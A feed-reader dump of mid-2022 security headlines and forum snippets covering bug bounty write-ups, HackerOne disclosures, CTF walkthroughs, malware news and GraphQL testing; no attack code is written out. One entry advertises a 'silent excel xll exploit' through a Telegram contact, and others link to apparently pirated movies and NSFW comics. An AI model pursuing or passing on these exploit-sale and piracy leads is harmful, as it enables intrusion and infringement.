    记一次由验证码绕过到越权访问的实战记录
    运气成分90%,技术含量10%的一次记录。
    BlackCat宣布对Creos攻击事件负责
    ALPHV勒索软件团伙,又名BlackCat,宣布对Creos卢森堡公司的网络攻击事件负责。
    超3200个应用程序泄露了 Twitter API 密钥
    网络安全研究人员发现一组异常的移动应用程序,这些应用程序向民众公开了 Twitter API 密钥。
    恶意软件Raccoon升级,窃取密码效率将大大提高
    在线平台Zscaler安全专家发布了对Raccoon Stealer恶意软件新变种的分析。
    研究发现,攻击者能利用Chromium浏览器书签同步功能泄露数据
    书签可以被滥用来从企业环境中吸走大量被盗数据,或者在几乎不会被发现的情况下从中部署攻击工具和恶意有效载荷。
    窃密恶意软件Raccoon最新样本Stealer v2分析
    Raccoon 是一个信息窃密恶意软件,能够从浏览器窃取例如密码、Cookie 和自动填充数据等隐私信息。
  • Open

    Learn SQL injection in practice by hacking vulnerable application! — StackZero
    No content preview
    How to Setup BurpSuite on Linux
    No content preview
    Is CSRF really dead? Examining Stripe’s $5000 CSRF bug bounty.
    Testing for CSRF can be worth it. Continue reading on InfoSec Write-ups »
  • Open

    Learn SQL injection in practice by hacking vulnerable application! — StackZero
    No content preview
    How to Setup BurpSuite on Linux
    No content preview
    Is CSRF really dead? Examining Stripe’s $5000 CSRF bug bounty.
    Testing for CSRF can be worth it. Continue reading on InfoSec Write-ups »
  • Open

    Learn SQL injection in practice by hacking vulnerable application! — StackZero
    No content preview
    How to Setup BurpSuite on Linux
    No content preview
    Is CSRF really dead? Examining Stripe’s $5000 CSRF bug bounty.
    Testing for CSRF can be worth it. Continue reading on InfoSec Write-ups »
  • Open

    Threat analysis visualization?
    Hi peeps, I'm a SOC analyst and I was wondering if there's a software to visualize threats and incidents. I wanna create something like a timeline and such. I know I could just use visio or any other software like it but I was wondering if there's something specific for InfoSec. Thanks ;) submitted by /u/MenaHabib_ [link] [comments]
  • Open

    HackTheBox — Dancing
    Dancing is a boot2root machine on HackTheBox. It is “Very Easy” difficulty and is part of Tier 0 starting point challenges. Continue reading on Medium »
  • Open

    NimicStack: Call Stack Spoofing in Nim
    submitted by /u/DarkGrejuva [link] [comments]
  • Open

    Movies and Series
    Dunno about speeds or even its been posted before... http://88.99.99.152/ submitted by /u/DodgyguyNZL [link] [comments]

  • Open

    The Story of an Extortion Case
    I am using fake names in this story. The story is that there was this person that Zachery was talking to on a dating site. He was sadly… Continue reading on Medium »
    War in Ukraine / July 29–31
    Day 159: The food deal seems to have worked Continue reading on Medium »
    TryHackMe | WebOSINT Writeup
    TryHackMe’s WebOSINT room, finding information that no longer exists. Continue reading on Medium »
  • Open

    using wget terminal command to donwload your needed stuff/download stuff recursively
    ###########brougth to you by the guy who knows little bit about linux =what is wget? : it is a GNU computer program that retrieves content from web servers (long story short free software terminal programm that can batch download websites and what people post on this sub.) ​ =why do i need it? : sometimes its annoying to click thousands of links to download files instead of just using a free software solution that will crawl and download everything for you. ===how do i install wget? =windows : windows now has a builtin package manager(thanks linux) winget install GnuWin32.Wget or install choco package manager then do this choco install wget =linux:easy mode sudo pacman -S wget sudo dnf install wget sudo apt install wget (i think you dont need to do this since it maybe a…
    Windows comedy ISOs!
    submitted by /u/Plastic_Preparation1 [link] [comments]
    maths lecture notes
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
  • Open

    Changing region settings in Caine 12.4
    Hello Everyone, I'm using Caine 12.4 for image acquisition because it defaults to read only and, well I like it. Everything except for the fact that the region settings are set to Italian by default. It's a small thing, but I'd, at minimum, like to see the dates in English and prefer if the region was set to Canada, and the time zone to mountain time (Whitehorse, Yukon). I can do this manually after booting, but I've found the only way to get it to work properly is to set the time zone to mountain, set the region to Canada, and delete Italian from the language list (Without deleting the language the dates still display in Italian). So I'm wondering what I would need to edit in the iso to switch the region and timezone defaults, or at the very least remove Italian from the installed languages. If anyone can help me out with this it would be greatly appreciated. submitted by /u/thenebular [link] [comments]
    Upcoming skills test
    Hello all, please delete if not allowed. I have an interview and skills test at the end of the month for an analyst position with an ICAC unit for a law enforcement agency. I am fresh out of college and although I did take some digital forensic courses, the majority of my course work had a heavy emphasis on physical evidence. The job duties of the position are primarily to conduct research and preform field previews when necessary. I have no information on what the skills test will contain. What would you recommend I try to study before taking the test? This is an entry level position, so the test will likely not contain much materiel on complex techniques. Any help would be greatly appreciated. submitted by /u/No-Librarian4750 [link] [comments]
    MemProcFS - This Changes Everything
    Good morning, It’s time for a new 13Cubed episode! This one covers a tool that I truly believe is revolutionary. Imagine being able to "mount" memory as if it were a disk image. With a single command, MemProcFS will create a virtual file system representing the processes, file handles, registry, $MFT, and more. The tool can be executed against a memory dump, or run against memory on a live system. This is a game changer for memory forensics! Episode: https://www.youtube.com/watch?v=hjWVUrf7Obk Episode Guide: https://www.13cubed.com/episodes/ 13Cubed YouTube Channel: https://www.youtube.com/13cubed 13Cubed Patreon (Help support the channel and get early access to content and other perks!): https://www.patreon.com/13cubed submitted by /u/13Cubed [link] [comments]
  • Open

    SSTImap - Automatic SSTI detection tool with interactive interface
    SSTImap was developed as a new SSTI detection tool based on Tplmap. The main feature of this tool and a key difference with Tplmap is the interactive mode, which enhances detection and exploitation. Also, payload for Smarty was changed to work without {{php}}{{/php}} tag, which was disabled by default in Smarty 3.0. New payloads for other template engines will be developed. https://github.com/vladko312/SSTImap submitted by /u/vladko312 [link] [comments]
  • Open

    Threat Modeling Field Guide
    submitted by /u/sanitybit [link] [comments]
    SSTImap - Automatic SSTI detection tool with interactive interface
    submitted by /u/vladko312 [link] [comments]
    A Detailed Analysis of the RedLine Stealer
    submitted by /u/CyberMasterV [link] [comments]
  • Open

    Most Common Attacks in android Apps | InsecureShop
    InsecureShop is an Android application written in Kotlin that is designed to be intentionally vulnerable. It is a great asset for… Continue reading on Medium »
    How I get Full Account Takeover via stealing action’s login form | XSS
    Today I will explain How I get Full Account Takeover via stealing the action of the login form when you have XSS on the login page. Continue reading on Medium »
    PORTSWIGGER -Command Injection Vulnerabilities LAB Çözümleri
    Selam arkadaşlar bugün Command Injection zafiyetinden bahsedip, Portswigger’da bulunan soruların çözümlerinden anlatacağım. Continue reading on Medium »
    July Monthly Update
    July went by so fast! While we have so much to share, be sure to believe that we have much more planned for the next couple months. If you… Continue reading on Medium »
    ‘PTN’ infosec monthly #2 — InfoSec Updates
    Namaste everyone, Welcome to our ‘PTN’ infosec monthly #2 and we are back with the second newsletter with PTN Anniversary special updates… Continue reading on Pentester Nepal »
    How I earned $10,000 within the last 7 months — 17y/o Edition
    you know that I mostly earn bounties in Cryptocurrencies and this leads to the answer → I mostly hunt on XXXXXXXXXXXX Continue reading on InfoSec Write-ups »
    This SIMPLE vulnerability in Shopify earned a $2500 bug bounty
    Don’t forget to check for user access rights Continue reading on InfoSec Write-ups »
    Responder Starting Point HacktheBox Walkthrough
    Responder Starting Point is a very good Challenge by HackTheBox. In this article we are going exploit it. Continue reading on Medium »
    Intigriti’s July 0722 XSS Challenge Writeup
    I. Overview Continue reading on Medium »
    VAPT — Common & Uncommon Interview Questions! Episode-1
    Here are some of the amazing interview questions that we came across and wanted to share with you. Continue reading on Medium »
  • Open

    X Stock Seems Boring but has Big Upside Potential | Utradea
    Based on the overall X stock forecast of $32.62 per share (derived from P/E & EPS, and comparable valuations), and the current price of X… Continue reading on Medium »
  • Open

    Faraday – open-source Vulnerability Management
    Article URL: https://faradaysec.com/community-v4/ Comments URL: https://news.ycombinator.com/item?id=32309146 Points: 4 # Comments: 2
  • Open

    LastPass vs Bitwarden
    Been using LastPass for years. I've been happy until my Windows 10 work laptop had an issue. The LastPass browser plugin sucks up 100% CPU. Never had this issue before. Switched to Bitwarden with no issues. Questions Has anyone else seen this issue? Which password manager would you recommend? Any issues with Bitwarden security? ​ Note: I find Bitwarden a bit clunky for day to day use. Not as slick as LastPass. Other than that I don't have a problem with it. And I kinda like the desktop app. Thanks! submitted by /u/damienhull [link] [comments]
    How do you deal with the identity crisis caused by cybersecurity?
    Well I [M27] have been interested in security since high school, and I have been working in the field for 4 years now between engineering and IR, I'm kinda good with what I do had my OSCP 3 years ago, with good background in many security fields, but now and then I feel that I want to get out of my comfort zone, I find people in the industry sharing everything on linkedin, doing podcasts that nobody listens to and posting infosec memes on their twitter where they have 7 followers, as if anybody interested. I'm not sure if it's a social issue but I rarely talk about cybersecurity on my social media or with friends and prefer sharing memes that's not related to cybersecurity, by time I feel that I have 2 personalities, i feel sad sometimes that i hate showing off and there are people who like showing off because they got a 4 letters business certificate with no technical knowledge, anybody feel the same? submitted by /u/xoutisx [link] [comments]
    Will having secret clearance take me far in Security if I don’t intend to work for the govt. long term?
    I’m more interested in working for bigger companies doing security than I am for the government- but most important to me is opening doors. If doing cybersecurity for the govt. for a few years gives me plenty of opportunities for working in other companies, I don’t mind doing it. I have two job offers and one is a threat analyst for a bigger company that’s well known in this industry, and the other is a security analyst for a government contractor and I can get a secret clearance. Haven’t decided which one will be a bigger step for my career. My end goal is to become a security engineer. One of these will be my first cybersecurity job. submitted by /u/Good-Turnip-8963 [link] [comments]
  • Open

    SecWiki News 2022-08-01 Review
    Windows下基础免杀技术 by SecIN社区 SecWiki周刊(第439期) by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-08-01 Review
    Windows下基础免杀技术 by SecIN社区 SecWiki周刊(第439期) by ourren 更多最新文章,请访问SecWiki
  • Open

    Go Fuzzing
    What is Fuzzing? Continue reading on Towards Dev »
  • Open

    Go Fuzzing
    What is Fuzzing? Continue reading on Towards Dev »
  • Open

    Insecure TLS Configuration #3530
    Hyperledger disclosed a bug submitted by bhaskar_ram: https://hackerone.com/reports/1639423
    delete the subaccount from the user id
    Showmax disclosed a bug submitted by qualwin38000: https://hackerone.com/reports/1646340 - Bounty: $700
    Insecure use of shell.openExternal() in Rocket.Chat Desktop App leading to RCE
    Rocket.Chat disclosed a bug submitted by baltpeter: https://hackerone.com/reports/924151
    Race condition on https://judge.me/people
    Judge.me disclosed a bug submitted by netboom: https://hackerone.com/reports/1566017 - Bounty: $250
  • Open

    HackTheBox — Fawn
    Fawn is a boot2root CTF on HackTheBox. It is “Very Easy” difficulty and is part of Tier 0 starting point challenges. Continue reading on Medium »
    PortSwigger Web Security Academy Lab: SQL injection vulnerability in WHERE clause allowing…
    PortSwigger Web Security Academy Lab: SQL injection Continue reading on Bilişim Hareketi »
    Kerberos
    Hey friends, it is the second article in my Active Directory Theory and Exploitation series. Today, I would like to talk about Kerberos… Continue reading on Medium »
  • Open

    IW Weekly #13: 1000s of user tokens exposed, pre-auth RCEs in Oracle, AWS Misconfigurations, IDOR…
    No content preview
    Cybersecurity Learning Path
    No content preview
    Zero-day XSS
    No content preview
    Why this EASY vulnerability resulted in a $20,000 bug bounty from GitLab
    The hidden dangers of numerical IDs Continue reading on InfoSec Write-ups »
    This SIMPLE vulnerability in Shopify earned a $2500 bug bounty
    Don’t forget to check for user access rights Continue reading on InfoSec Write-ups »
  • Open

    IW Weekly #13: 1000s of user tokens exposed, pre-auth RCEs in Oracle, AWS Misconfigurations, IDOR…
    No content preview
    Cybersecurity Learning Path
    No content preview
    Zero-day XSS
    No content preview
    Why this EASY vulnerability resulted in a $20,000 bug bounty from GitLab
    The hidden dangers of numerical IDs Continue reading on InfoSec Write-ups »
    This SIMPLE vulnerability in Shopify earned a $2500 bug bounty
    Don’t forget to check for user access rights Continue reading on InfoSec Write-ups »
  • Open

    IW Weekly #13: 1000s of user tokens exposed, pre-auth RCEs in Oracle, AWS Misconfigurations, IDOR…
    No content preview
    Cybersecurity Learning Path
    No content preview
    Zero-day XSS
    No content preview
    Why this EASY vulnerability resulted in a $20,000 bug bounty from GitLab
    The hidden dangers of numerical IDs Continue reading on InfoSec Write-ups »
    This SIMPLE vulnerability in Shopify earned a $2500 bug bounty
    Don’t forget to check for user access rights Continue reading on InfoSec Write-ups »
  • Open

    FreeBuf早报 | 上半年全国网络执法工作取得明显成效;美国众议院通过《勒索软件法案》
    2022年上半年,全国网信系统持续加大网络执法力度、规范网络执法行为,坚决依法查处各类违法违规案件,取得明显成效。
    MBDA疑似被入侵,攻击者声称获取机密
    一个名为Adrastea的攻击组织声称已经入侵了跨国导弹制造商 MBDA。
    1.1万个虚假投资网站组成的庞大网络“盯上”了欧洲
    研究人员发现了一个由 1.1万多个域名组成的巨大网络,正在向欧洲用户推广虚假投资计划。
    大华摄像头存在安全漏洞,目前已得到修复
    通过该漏洞,攻击者可获取最高权限,对受影响设备无限制访问,包括实时观看和重放摄像头视频。
    Google Play商店现17款DawDropper银行恶意软件
    这些应用包括了文档扫描仪、VPN服务、二维码阅读器和通话记录器等,共携带了 Octo、Hydra、Ermac和TeaBot四个银行木马系列。
    VeinMind:一款容器安全检测工具使用全记录
    最近在调研国内外开源的容器安全相关工具,发现了很多优秀的项目,国外的项目有trivy、anchor等,在漏洞检测这块做的很出色了;而国内的项目不多,关注非漏洞检测的工具更少,所以对一款名为问脉的开源容
  • Open

    should i delete this since the code may not actually be used in production
    submitted by /u/ParkingMobile2095 [link] [comments]
  • Open

    Virtual Images for Testing
    Many within the DFIR community make use of virtual systems for testing...for detonating malware, trying things within a "safe", isolated environment, etc. However, sometimes it can be tough to get hold of suitable images for creating that testing environment. I've collected a bunch of links to VirtualBox VMs for Windows, but I cannot attest to all of them actually working. But, if you'd like to try any of them, here they are... MS Edge developer virtual machines (Win7 - 10, limited time) Windows 7 Image, reports no activation needed Win95 virtual machine Various MS virtual machines (MS-DOS, Windows, etc.) Windows 11 Dev Environment (eval) Use Disk2vhd to create a virtual machine from an existing installation ReactOS - clone of Windows 5.2 (XP/2003) There's no shortage of Linux and Unix variant OS VMs available. For example, you can find Solaris VMs here. For MacOS Big Sur, you can try this site. Back in 1994 and '95, while I was in graduate school, I went to Frye's Electronics in Sunnyvale (across the street from a store called "Weird Stuff") and purchased a copy of OS/2 2.1. I did that because the box came with a $15 coupon for the impending OS/2 Warp 3.0. If you'd like to give the OS/2 Warp OS a shot, you can try this v4.52 download, or try this site for other versions of OS/2. If you're a fan of CommodoreOS, you can give this site a shot. For AmigaOS, try here, or here. How about Plan9? General Download Sites OSBoxes SysProbs VirtualBoxes Hope that helps!
  • Open

    The underlying rules of bug bounty
    3 entities, 3 jobs The bug bounty industry is mainly composed of three big entities with each a specific job: Programs: the need. Companies who want to test their security. Besides triage, companies have alot to do. Create well detailed policies to ensure that hunters will focus on the most interesting issues. Prepare the internal workflow of all concerned teams to handle the flow of reports. Estimate the severity of every reports and consequently reward and finally, fix the bugs.

  • Open

    Top 10 most rated OSINT Tools on Github
    We’re a little fed up with OSINT tools claiming they’re the best. So, we spent some time looking at some hard facts from Github. After… Continue reading on Medium »
    Officer_CIA X MaxWayld: Content Overview
    Greetings dear readers! Today I present to your attention an article written by my good friend Max — in it he made a review of more than a… Continue reading on Medium »
    The Art of Angle In GEO-OSINT Investigation
    Hey, my name is Satyam Jaiswal and in this blog, I want to share how sometimes in the OSINT investigation especially in GEO OSINT, the idea Continue reading on Medium »
    Як виявити та нейтралізувати сітку шкідливих сайтів? (кейс)
    Виявлення, комплексний аналіз і ліквідація шкідливих, спамних, фішингових сторінок, URL-адрес, посилань і сайтів. Continue reading on KR. LABORATORIES IT BLOG »
    SPY NEWS: 2022 — Week 30
    Summary of the espionage-related news stories for the Week 30 (July 24–30) of 2022. Continue reading on Medium »
  • Open

    intigriti Challenge 0722 by Vroemy
    Another awesome XSS challenge from Intigriti. Personally, I learn a lot trying to solve these monthly challenges by Intigriti. The… Continue reading on Medium »
    How to Exploit CSRF (Cross Site Request Forgery) in Web Applications — Pentester Academy Challenge
    Introduction Continue reading on Medium »
    Why this EASY vulnerability resulted in a $20,000 bug bounty from GitLab
    The hidden dangers of numerical IDs Continue reading on InfoSec Write-ups »
    Vulnerabilities Scan
    Vulnerabilities Scan: 15000+PoCs; 20 kinds of application password crack; 7000+Web fingerprints; 146 protocols and 90000+ rules Port… Continue reading on Medium »
    MSA Weekly 5 — “How to Get Sensitive Data Exposure on Web Application”
    Hai Haiii, bertemu lagi nih kita. Kali ini penulis akan mencoba untuk menjelaskan mengenai sensitive data exposure dan bagaimana kita bisa… Continue reading on Medium »
    Do you need to be a programming pro to hack?
    Hacking is always presented in the media by thousands of lines of code flashing on a person’s laptop. Is this reality? Continue reading on Medium »
    Buffer Overflow: Understanding CPU Registers
    Hello Security folks, In previous article, we came to know about Stack, How Application memory works and Memory Addresses. In this article… Continue reading on Medium »
    Crocodile Starting Point HackTheBox Challenge Walkthrough.
    Crocodile is really awesome challenge by HackTheBox to practice skills related to Hacking. In today’s writeup we are going to solve this… Continue reading on Medium »
  • Open

    What is this site doing? [blackscreen]
    This site starts some service worker and seems to download/upload something just by loading what is just literally a black screen. It also created 66kb worth of cookies which I had to delete. Any insight on what it might be trying to do? This is one of the first results in google if you search for a black screen. The idea of searching for a black screen or any color is just to have a solid background for whatever reason like taking screenshots, but I think it's trying to do something fishy. submitted by /u/PlatformKnuckles [link] [comments]
    What is WMAgent?
    I found this CVE-2022-34558 which states that a WMAgent is vulnerable. I have searched the internet but I didn't understand much. submitted by /u/Chroll-On [link] [comments]
    Q: Security risk of a permanent Fritzbox-VPN connection with my parents network?
    Hello everyone, I started in the last months to educate my self more and more about privacy and cyber security. I have also started to host services and data locally. I also started to improve my network infrastructure through various services (pi-hole... etc.). Now I have also started the mission to educate my parents about this and make them aware of their digital footprint and threats. I also had the idea to use the Fritzbox VPN to connect the networks and make elements of my network infrastructure accessible to them so they do not need to build a redundant infrastructure up and maintain it. Now I would like to avoid securing myself first and then exposing myself to unmanageable/unknown risks with such a connection to my parents network. I would love to understand the risk of network wide threats better (e.g. malware that effects the whole network cross vpn ? ...) . Moreover, I cannot evaluate the security of the Fritzbox VPN (google resluts say its ok?) (Unfortunately, their Fritzbox is a bit older and will not support Wireguard). The alternative is to simply set up easy things as a pihole on a raspi that I can prepare and easily set up. But not going with the "permanent connection" solution. I would love to learn from you guys how big the risk of such network wide threats is and how you would rate the Fritzbox VPN. Thanks! submitted by /u/DonSiffo [link] [comments]
    Roadmap for getting into cyber forensics?
    I’m a junior penetration tester. Currently looking to pivot into a different area as I’m realizing that pentesting isn’t for me. My initial thought was to switch to something less technical, but before I make that change I wanted to give forensics some consideration as I’ve always thought it would be cool to explore that. I know nothing about it though so I wanted to see if there are any of y’all out there that currently work in cyber forensics and ask if A) someone switching from penetration testing would feel comfortable in a forensics role and if a pentesting background would lead to success in forensics and B) any information on how to get started. What resources to start looking at, certifications to explore, jobs to consider that would lead to a smooth transition from pentesting into forensics, etc. submitted by /u/anon2user [link] [comments]
    Lightning Port HDMI Dongle (Amazon)
    I was considering on buying an HDMI dongle from Amazon vs the original apple one to save a few bucks. I’m thinking this could contain some sort of implant but trying to understand if there is a way for me to check this before putting it on my device. Are others experienced with how to trace if this is stealing my data? submitted by /u/jeepynomad [link] [comments]
  • Open

    Active Exploitation of Atlassian’s Questions for Confluence App CVE-2022-26138
    Article URL: https://www.rapid7.com/blog/post/2022/07/27/active-exploitation-of-atlassians-questions-for-confluence-app-cve-2022-26138/ Comments URL: https://news.ycombinator.com/item?id=32298575 Points: 1 # Comments: 0
  • Open

    数据安全技术和市场的学习
    安全企业对数据安全的认知程度还需要跟上国家的高度,加大投入,更进一步。
    攻防演习主场作战是什么样的体验?(社工+近源)
    一次梦幻的红队行动,主场作战,成果丰富。
  • Open

    SecWiki News 2022-07-31 Review
    安全知识图谱技术概述 by ourren Malware Analysis Tools 2022 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-07-31 Review
    安全知识图谱技术概述 by ourren Malware Analysis Tools 2022 by ourren 更多最新文章,请访问SecWiki
  • Open

    Men of The Auxiliary Division of the Royal Irish Constabulary, listed alphabetically
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
    tools
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
    Pictures of Adventure Time show
    Highly NSFW comics https://drive.google.com/drive/mobile/folders/0B42kNriZcp4cLWlwSDlQYXdIOFE?usp=sharing&resourcekey=0-MrZHfmBcSPlHVIKzTBJIyQ submitted by /u/RainyAbrar [link] [comments]
  • Open

    How can I determine whether artefacts in Safari are local or synced?
    If they are synced artefacts - what device identifier is available? submitted by /u/zoomjua [link] [comments]
    Digital Forensic Introduction Video
    In this video, I have covered the following content: 1) What is Cyber Crime? 2) What are the different types of cybercrime? 3) Forensics Investigation Procedure 4) Effective Strategy for CISOs for Forensics Requirements 5) Top tools 6) Good Evidence Principles 7) What is "Chain of Custody?" ​ https://www.youtube.com/watch?v=u2zgEFm5RHQ submitted by /u/prabhnair1 [link] [comments]
  • Open

    EDR Blindness, pt II
    As a follow-on to my earlier blog post, I've seen a few more posts and comments regarding EDR 'bypass' and blinding/avoiding EDR tools, and to be honest, my earlier post stands. However, I wanted to add some additional thoughts...for example, when considering EDR, consider the technology, product, and service in light of not just the threat landscape, but also the other telemetry you have available.  This uberAgent article was very interesting, in particular the following statement: “DLL sideloading attack is the most successful attack as most EDRs fail to detect, let alone block it.” The simple fact is, EDR wasn't designed to detect DLL side loading, so this is tantamount to saying, "hey, I just purchased this brand new car, and it doesn't fly, nor does it drive underwater...".  Joe Stock…
  • Open

    Weekend Wrap-up of Infosec News
    submitted by /u/SuaveHobo [link] [comments]
    CQ, a code security scanner
    submitted by /u/0xdea [link] [comments]
  • Open

    Open S3 Bucket Accessible by any Aws User
    GoCD disclosed a bug submitted by khalidou: https://hackerone.com/reports/1654145
  • Open

    HackTheBox — Meow
    Meow is boot2root CTF on HackTheBox. It has the difficulty “very easy” and is part of the Tier 0 starting point machines. Continue reading on Medium »
  • Open

    Silent excel xll exploit - telegram : mave12x
    submitted by /u/SarahEliset [link] [comments]

  • Open

    Abwaab Data Leak
    Over 2,26 #million users #data leaked from Abwaab Jordan Platform, Continue reading on Medium »
    Zero-day XSS
    Hello Cyber Security Enthusiast. I’m back again with another article of XSS. In this article, I’ll explain how I got an unexpected XSS and… Continue reading on InfoSec Write-ups »
    How I Earned €150 in 2 Minutes | HTML injection in email
    Introduction : Continue reading on Medium »
    Authentication Bypass
    Hello folks, Continue reading on Medium »
    Cross-function re-entrancy in the wild
    After many catastrophic, tragic incidents in the past, I believe that every one would have heard about this so-called “re-entrancy” attack… Continue reading on Medium »
    Sequel Starting Point HackTheBox Challenge Tier 1 WriteUp
    Sequel is a really nice challenge by HacktheBox to Practice Hacking skills. So in this writeup we are going to dive into it. Continue reading on Medium »
  • Open

    Pokemon-Shellcode-Loader: Tired of looking at hex all day and popping '\x41's? Rather look at Lugia/Charmander? I have the solution for you.
    submitted by /u/Techryptic [link] [comments]
    Running Exploit As Protected Process Ligh From Userland
    submitted by /u/tasty-pepperoni [link] [comments]
    CVE-2022-36123 - Linux kernel <5.18.13 lacks a certain clear operation for the block starting symbol (.bss). This allows Xen PV guest OS users to cause a denial of service, or gain privileges.
    submitted by /u/docker-osx [link] [comments]
  • Open

    Running Exploit As Protected Process Ligh From Userland
    A tool, called RunAsWinTcb, uses a userland exploit to run a DLL with the protection of Protected Process Light(WinTcb-Ligh signer type) Blog about the vulnerability and tool: https://tastypepperoni.medium.com/running-exploit-as-protected-process-ligh-from-userland-f4c7dfe63387 The tool: https://github.com/tastypepperoni/RunAsWinTcb submitted by /u/tasty-pepperoni [link] [comments]
    Pokémon Shellcode Loader
    submitted by /u/Techryptic [link] [comments]
  • Open

    A Newbie need some help with patch analysis
    Hi There, A year ago i started my career in App Sec as a penetration tester. But what i want to learn now is the patch analysis.Basically when a CVE gets released the vendor releases a patch.But the issue I am facing is finding the patch it self.Yes GitHub is the right place to looking but there are so many commits out there , how do you identify the right commit to analyse the patch so that you can develop your own exploit or may be find a bypass Any help is Appreciated. submitted by /u/wh0am1root [link] [comments]
  • Open

    x-ways editing event log definition file.
    Question for anyone that uses X-ways. I am trying to edit the exvt definition file that parses out windows events on x-ways. I want to add some other events to it. However, when I edit the text document that holds the information for it and saved it after, there is no change. I even tried to process the case again no change. Anyone have any ideas on this. submitted by /u/divinealpha12 [link] [comments]
    Transition from Government to Private Sector
    I am looking to transition to private sector after 8 years of digital forensics in a law enforcement capacity. Are there any hiring managers out there that can give advice on what you look for or possibly provide resume critique? submitted by /u/outdorksman [link] [comments]
  • Open

    Arris / Arris-variant DSL/Fiber router critical vulnerability exposure
    Article URL: https://derekabdine.com/blog/2022-arris-advisory.html Comments URL: https://news.ycombinator.com/item?id=32288020 Points: 77 # Comments: 22
  • Open

    SecWiki News 2022-07-30 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-07-30 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    HacktheBox [Late]
    Full Nmap TCP scan shows port 80 and 22 open: Continue reading on Medium »
    RED TEAM ASSESSMENT SERVICE IN DELHI
    Definition Continue reading on Medium »
  • Open

    Corsa Site Scripting Vulnerability (XSS)
    Hyperledger disclosed a bug submitted by bhaskar_ram: https://hackerone.com/reports/1650210
    Open redirection at https://smartreports.mtncameroon.net
    MTN Group disclosed a bug submitted by vulnera: https://hackerone.com/reports/1530396
  • Open

    To the pentesters, what's in your kit bag?
    Found the same thread from 8 years ago and am wondering about new answers and the current kit. So to the pentesters, what do you carrry in your bag for pentests at the customers location? submitted by /u/namelessOnReddit_ [link] [comments]
    Is this attack possible or just a scare tactic ?
    I was browsing regarding vpns and a website said this, "Even when you are using a VPN it is possible to find out who you are by looking at your Hostname, Computer name or MAC address by those on the web or local network. If you're for example using torrents it is possible to see your Computer ID. If someone really wants to find out who you are, they can by creating a simple algorithm to track your Computer ID patterns in torrent networks. Same method can be applied to all types of networks." Is this true or just a scare tactic ? submitted by /u/zilla005 [link] [comments]
    SANS MSISE - employment waiver
    Personal background: Active duty Navy aviation electronics technician. Four years remaining on my contract. Currently on track to finish B.S. in cybersecurity in Spring 2023. I've started looking into graduate programs; namely at my current institution but also the SANS Information Security Engineering program. I've heard varying opinions on the ROI of a masters degree; but between my Navy tuition assistance and GI-Bill, I could have the program funded. Not to mention the certifications that the program would lead to. All that said, I'm wondering if anyone has experience with getting the graduate admissions employment requirement waived. As an aviation electronics technician I work with computers and classified material; mostly aircraft systems, classified computer systems, COMSEC, etc. With that in mind, I'm not certain I would be able to apply all the concepts directly. Would mentioning a home lab setup bolster my chances? submitted by /u/SlipshodRaven [link] [comments]
  • Open

    GSuite domain takeover through delegation
    No content preview
  • Open

    GSuite domain takeover through delegation
    No content preview
  • Open

    GSuite domain takeover through delegation
    No content preview
  • Open

    GraphQL Security
    🔍 Introduction GraphQL은 웹에서 브라우저가 서버로 데이터를 효율적이게 가져는 것을 목적으로 하는 Query Lanauge로 기존 REST API의 문제를 해결하고자 등장한 기술입니다. REST API가 서버에서 정의한 스펙에 따라 호출해서 데이터를 얻는 형태라면 GraphQL은 클라이언트가 정의한 포맷으로 가져오고 싶은 데이터를 가져오는 기술입니다. REST API, SQL을 통한 서비스들이 백엔드에서 쿼리하고 처리한다면, GraphQL 서비스는 프론트에서 쿼리하고 처리하는 비중이 높습니다. 그래서 GraphQL의 HTTP 요청은 구조를 정의하는 Schema와 실제 쿼리인 Query와 Mutation 부분으로 나뉘어집니다. 그리고 이를 GQL이라고 부릅니다. Schema type Query { polygon (sides: Int, regular: Boolean): Polygon } type Polygon { perimeter: Float area: Float } Query & Mutation query { polygon(sides: 1, regular: true) { perimeter area } } mutation { createPerson(input: { ... }) { person { id name } } updatePerson(input: { ... }) { person { id name } } } 🗡 Offensive techniques How to Testing GraphQL을 사용하는 서비스는 보통 자주 사용되는 Form, JSON 기반이 아닌 별도의 Body를 가지고 있습니다. 그리고 보통 /graphql 등의 경로를 많이 사용하며 해당 경로가 아니더라도 query를 포함한 경우 GrphQL 서비스로 확인합니다. Testing point 위에서 설명했듯이 GraphQL에서의 백엔드는 전달받은 GQL에 따라 데이터를 처리만 합니다. 쿼리를 구성하는 부분은 프론트에서 담당하게 됩니다. 그 소리는 결국 기존 백엔드에 감춰진 로직들이 프론트엔드로 많이 넘어온다는 의미이고, 곧 우리가 테스팅할 포인트가 늘어났다는...
    ZAP⚡️ Replacer VS Sender Script
